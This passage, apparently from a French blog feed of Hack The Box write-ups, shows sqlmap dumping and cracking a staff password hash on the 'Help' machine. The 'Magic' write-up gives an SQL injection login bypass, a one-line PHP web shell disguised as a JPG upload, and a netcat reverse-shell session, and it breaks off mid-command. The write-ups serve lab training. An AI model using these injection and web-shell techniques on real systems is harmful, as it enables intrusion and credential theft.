sqlmap -r ticket.req --batch --thread 10 -D support -T staff --columns </span></span></span><span class="line"><span class="cl"><span class="s2"> ___ </span></span></span><span class="line"><span class="cl"><span class="s2"> __H__ </span></span></span><span class="line"><span class="cl"><span class="s2"> ___ ___[)]_____ ___ ___ {1.9.3.3#dev} </span></span></span><span class="line"><span class="cl"><span class="s2">|_ -| . [,] | .&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s2">|___|_ [&#39;]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s2"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] starting @ 14:40:14 /2025-08-27/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:14] [INFO] parsing HTTP request from &#39;ticket.req&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:15] [INFO] resuming back-end DBMS &#39;mysql&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:15] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s2">sqlmap resumed the following injection point(s) from stored session: </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">Parameter: param[] (GET) </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: AND boolean-based blind - WHERE or HAVING clause </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND 2859=2859 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: time-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP) </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:15] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s2">web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) </span></span></span><span class="line"><span class="cl"><span class="s2">web application technology: Apache 2.4.18 </span></span></span><span class="line"><span class="cl"><span class="s2">back-end DBMS: MySQL &gt;= 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:15] [INFO] fetching columns for table &#39;staff&#39; in database &#39;support&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:15] [INFO] retrieved: 14 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:16] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:16] [INFO] retrieved: 2 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:17] [INFO] retrieved: id </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:17] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:40:17] [INFO] retrieved: 7 </span></span></span><span class="line"><span class="cl"><span class="s2">... </span></span></span><span class="line"><span class="cl"><span class="s2">... </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:18] [INFO] retrieved: 5 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:19] [INFO] retrieved: admin </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:19] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:19] [INFO] retrieved: 6 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:21] [INFO] retrieved: int(1) </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:21] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:21] [INFO] retrieved: 6 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:24] [INFO] retrieved: status </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:24] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:24] [INFO] retrieved: 24 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:28] [INFO] retrieved: enum(&#39;Enable&#39;,&#39;Disable&#39;) </span></span></span><span class="line"><span class="cl"><span class="s2">Database: support </span></span></span><span class="line"><span class="cl"><span class="s2">Table: staff </span></span></span><span class="line"><span class="cl"><span class="s2">[14 columns] </span></span></span><span class="line"><span class="cl"><span class="s2">+------------------------+--------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s2">| Column | Type | </span></span></span><span class="line"><span class="cl"><span class="s2">+------------------------+--------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s2">| admin | int(1) | </span></span></span><span class="line"><span class="cl"><span class="s2">| status | enum(&#39;Enable&#39;,&#39;Disable&#39;) | </span></span></span><span class="line"><span class="cl"><span class="s2">| avatar | varchar(200) | </span></span></span><span class="line"><span class="cl"><span class="s2">| department | text | </span></span></span><span class="line"><span class="cl"><span class="s2">| email | varchar(255) | </span></span></span><span class="line"><span class="cl"><span class="s2">| fullname | varchar(100) | </span></span></span><span class="line"><span class="cl"><span class="s2">| id | int(11) | </span></span></span><span class="line"><span class="cl"><span class="s2">| last_login | int(11) | </span></span></span><span class="line"><span class="cl"><span class="s2">| login | int(11) | </span></span></span><span class="line"><span class="cl"><span class="s2">| newticket_notification | smallint(1) | </span></span></span><span class="line"><span class="cl"><span class="s2">| password | varchar(255) | </span></span></span><span class="line"><span class="cl"><span class="s2">| signature | mediumtext | </span></span></span><span class="line"><span class="cl"><span class="s2">| timezone | varchar(255) | </span></span></span><span class="line"><span class="cl"><span class="s2">| username | varchar(255) | </span></span></span><span class="line"><span class="cl"><span class="s2">+------------------------+--------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[14:41:28] [INFO] fetched data logged to text files under &#39;/root/.local/share/sqlmap/output/help.htb&#39; </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] ending @ 14:41:28 /2025-08-27/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">---------------------------------------------------------------------- </span></span></span><span class="line"><span class="cl">$<span class="s2"> sqlmap -r ticket.req --batch --thread 10 -D support -T staff --dump </span></span></span><span class="line"><span class="cl"><span class="s2"> ___ </span></span></span><span class="line"><span class="cl"><span class="s2"> __H__ </span></span></span><span class="line"><span class="cl"><span class="s2"> ___ ___[(]_____ ___ ___ {1.9.3.3#dev} </span></span></span><span class="line"><span class="cl"><span class="s2">|_ -| . [&#34;</span><span class="o">]</span> <span class="p">|</span> .<span class="s1">&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s1">|___|_ [&#39;</span><span class="o">]</span>_<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span>__,<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span>V... <span class="p">|</span>_<span class="p">|</span> https://sqlmap.org </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> legal disclaimer: Usage of sqlmap <span class="k">for</span> attacking targets without prior mutual consent is illegal. It is the end user<span class="s1">&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[*] starting @ 14:41:39 /2025-08-27/ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] parsing HTTP request from &#39;</span>ticket.req<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] resuming back-end DBMS &#39;</span>mysql<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s1">sqlmap resumed the following injection point(s) from stored session: </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">Parameter: param[] (GET) </span></span></span><span class="line"><span class="cl"><span class="s1"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s1"> Title: AND boolean-based blind - WHERE or HAVING clause </span></span></span><span class="line"><span class="cl"><span class="s1"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND 2859=2859 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Type: time-based blind </span></span></span><span class="line"><span class="cl"><span class="s1"> Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP) </span></span></span><span class="line"><span class="cl"><span class="s1"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) </span></span></span><span class="line"><span class="cl"><span class="s1">--- </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s1">web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety) </span></span></span><span class="line"><span class="cl"><span class="s1">web application technology: Apache 2.4.18 </span></span></span><span class="line"><span class="cl"><span class="s1">back-end DBMS: MySQL &gt;= 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] fetching columns for table &#39;</span>staff<span class="s1">&#39; in database &#39;</span>support<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:39] [INFO] resumed: 14 </span></span></span><span class="line"><span class="cl"><span class="s1">... </span></span></span><span class="line"><span class="cl"><span class="s1">... </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:53] [INFO] retrieved: support@mysite.com </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:53] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:53] [INFO] retrieved: 13 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:56] [INFO] retrieved: Administrator </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:56] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:56] [INFO] retrieved: 1 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:57] [INFO] retrieved: 1 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:58] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:41:58] [INFO] retrieved: 10 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:01] [INFO] retrieved: 1543429746 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:01] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:01] [INFO] retrieved: 10 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:03] [INFO] retrieved: 1547216217 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:03] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:03] [INFO] retrieved: 1 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:04] [INFO] retrieved: 0 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:04] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:04] [INFO] retrieved: 40 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:12] [INFO] retrieved: d318f44739dced66793b1a603028133a76ae680e </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:12] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:12] [INFO] retrieved: 28 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:17] [INFO] retrieved: Best regards, Administrator </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:17] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:17] [INFO] retrieved: 0 </span></span></span><span class="line"><span class="cl"><span class="s1">multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:18] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch &#39;</span>--no-cast<span class="s1">&#39; or switch &#39;</span>--hex<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:21] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:21] [INFO] retrieved: 5 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] retrieved: admin </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] recognized possible password hashes in column &#39;</span>password<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N </span></span></span><span class="line"><span class="cl"><span class="s1">do you want to crack them via a dictionary-based attack? [Y/n/q] Y </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] using hash method &#39;</span>sha1_generic_passwd<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">what dictionary do you want to use? </span></span></span><span class="line"><span class="cl"><span class="s1">[1] default dictionary file &#39;</span>/opt/tools/sqlmap/data/txt/wordlist.tx_<span class="s1">&#39; (press Enter) </span></span></span><span class="line"><span class="cl"><span class="s1">[2] custom dictionary file </span></span></span><span class="line"><span class="cl"><span class="s1">[3] file with list of dictionary files </span></span></span><span class="line"><span class="cl"><span class="s1">&gt; 1 </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] using default dictionary </span></span></span><span class="line"><span class="cl"><span class="s1">do you want to use common password suffixes? (slow!) [y/N] N </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] starting dictionary-based cracking (sha1_generic_passwd) </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:23] [INFO] starting 12 processes </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:24] [INFO] cracked password &#39;</span>Welcome1<span class="s1">&#39; for user &#39;</span>admin<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">Database: support </span></span></span><span class="line"><span class="cl"><span class="s1">Table: staff </span></span></span><span class="line"><span class="cl"><span class="s1">[1 entry] </span></span></span><span class="line"><span class="cl"><span class="s1">+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s1">| id | email | login | avatar | admin | status | fullname | password | timezone | username | signature | department | last_login | newticket_notification | </span></span></span><span class="line"><span class="cl"><span class="s1">+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s1">| 1 | support@mysite.com | 1547216217 | NULL | 1 | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | &lt;blank&gt; | admin | Best regards,\r\nAdministrator | a:1:{i:0;s:1:&#34;1&#34;;} | 1543429746 | 0 | </span></span></span><span class="line"><span class="cl"><span class="s1">+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:30] [INFO] table &#39;</span>support.staff<span class="s1">&#39; dumped to CSV file &#39;</span>/root/.local/share/sqlmap/output/help.htb/dump/support/staff.csv<span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">[14:42:30] [INFO] fetched data logged to text files under &#39;</span>/root/.local/share/sqlmap/output/help.htb<span class="err">&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ending @ 14:42:30 /2025-08-27/ </span></span></code></pre></td></tr></table> </div> </div><p>Après l&rsquo;utilisation de SQLMap, nous n&rsquo;avons pas eu besoin de faire une attaque par dictionnaire sur le hachage. En effet, SQLmap s&rsquo;en est chargé et a trouvé le mot de passe : &ldquo;d318f44739dced66793b1a603028133a76ae680e&rdquo; &ndash;&gt; <code>Welcome1</code>.</p> <p>Il ne reste plus qu&rsquo;à se connecter en SSH avec l&rsquo;utilisateur <strong>help</strong> et ce mot de passe.</p> <h2 id="tips">Tips </h2><ul> <li>Quand on trouve une version d&rsquo;un service exploitable, vraiment pousser au maximum. Tenter plusieurs fois l&rsquo;exploitation et avec plusieurs code différents.</li> <li>Vérifier rapidement le Kernel, en commençant par la date de sa compilation. Faire une recherche de la version rapidement sur internet, ça coûte rien et ici c&rsquo;était bien la solution. Linpeas ne surlignera pas la version du Kernel.</li> </ul>https://leopoldabgn.github.io/writeups/p/codetwo-htb/Sun, 24 Aug 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/codetwo-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="CodeTwo cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">CodeTwo</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.82</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <p>Soon :)</p>https://leopoldabgn.github.io/writeups/p/magic-htb/Thu, 24 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/magic-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Magic cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Magic</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.185</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## mysql</span> </span></span><span class="line"><span class="cl">theseus : <span class="sb">`</span>iamkingtheseus<span class="sb">`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">admin : <span class="sb">`</span>Th3s3usW4sK1ng<span class="sb">`</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.185 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 06d489bf51f7fc0cf9085e9763648dca <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 11a69298ce3540c729094f6c2d74aa66 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 7105991fa81b14d6038553f8788ecb88 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Magic Portfolio </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website--login-page">Website : login page </h3><p>On trouve un site internet sur le port 80 avec une page de login. Le site nous indique la possibilité d&rsquo;upload des images. Après avoir testé plusieurs combinaisons de credentials (ex: admin/admin, root/root&hellip;), on trouve une injection SQL qui nous permet de nous connecter</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">user: aaaa<span class="s1">&#39; or 1=1;-- </span></span></span><span class="line"><span class="cl"><span class="s1">password: aaaa&#39;</span> or <span class="nv">1</span><span class="o">=</span>1<span class="p">;</span>-- </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant cela comme <strong>user</strong> et <strong>password</strong>, on obtient un accès à la page <strong>upload.php</strong>.</p> <h3 id="upload-image--exploit-magic-byte">Upload image : Exploit Magic Byte </h3><p>On peut uploader des images avec du code <strong>php</strong> à l&rsquo;intérieur. Pour que le code php soit executé et que le fichier soit uploadé, il a fallu :</p> <ul> <li>Changer le magic byte par celui d&rsquo;une image XXX :</li> <li>Modifier l&rsquo;extension en &ldquo;.php.jpg&rdquo; (ou &ldquo;.php.png&rdquo;)</li> </ul> <p>En une seule ligne de code, cela nous donne :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> -ne <span class="s1">&#39;\xFF\xD8\xFF\xE0&lt;?php system($_GET[&#34;cmd&#34;]); ?&gt;&#39;</span> &gt; shell_magic.php.jpg </span></span></code></pre></td></tr></table> </div> </div><p>On peut alors executer du code php sur la machine en utilisant le paramètre <strong>cmd</strong> :</p> <blockquote> <p>http://10.10.10.185/images/uploads/shell_magic.php.jpg?cmd=id</p> </blockquote> <p>Pourquoi cela fonctionne ?</p> <ul> <li>Le serveur vérifie l&rsquo;extension du fichier. Ici, la dernière extension est bien &ldquo;.jpg&rdquo;, notre fichier passe le 1er test.</li> <li>Ensuite, le serveur vérifie le magic byte, il s&rsquo;agit de plusieurs octets ecrit au début du fichier précisant le type : JPG, GIF, PHP. Il suffit donc de placer le magic byte d&rsquo;une image PNG ou JPG pour passer cette deuxième couche de protection.</li> </ul> <p>Pourquoi le code php est executé ? Apache traite toutes les extensions dans un nom de fichier et s’arrête à la <strong>première extension</strong> qu’il reconnaît comme &ldquo;exécutable&rdquo; (comme .php), même si elle n’est pas la dernière. D&rsquo;où l&rsquo;importance d&rsquo;écrire &ldquo;.php.jpg&rdquo;. Si on place seulement &ldquo;.jpg&rdquo;, le serveur apache interpretera le fichier comme une image et le code ne sera pas executé.</p> <p>En utilisant le reverse shell php &ldquo;pentest monkey&rdquo;, on obtient facilement un shell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185:51964. </span></span><span class="line"><span class="cl">Linux magic 5.3.0-42-generic <span class="c1">#34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 06:41:39 up 19:17, <span class="m">0</span> users, load average: 0.00, 0.00, 0.00 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1197<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">www-data@magic:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@magic:/$ python3 -c <span 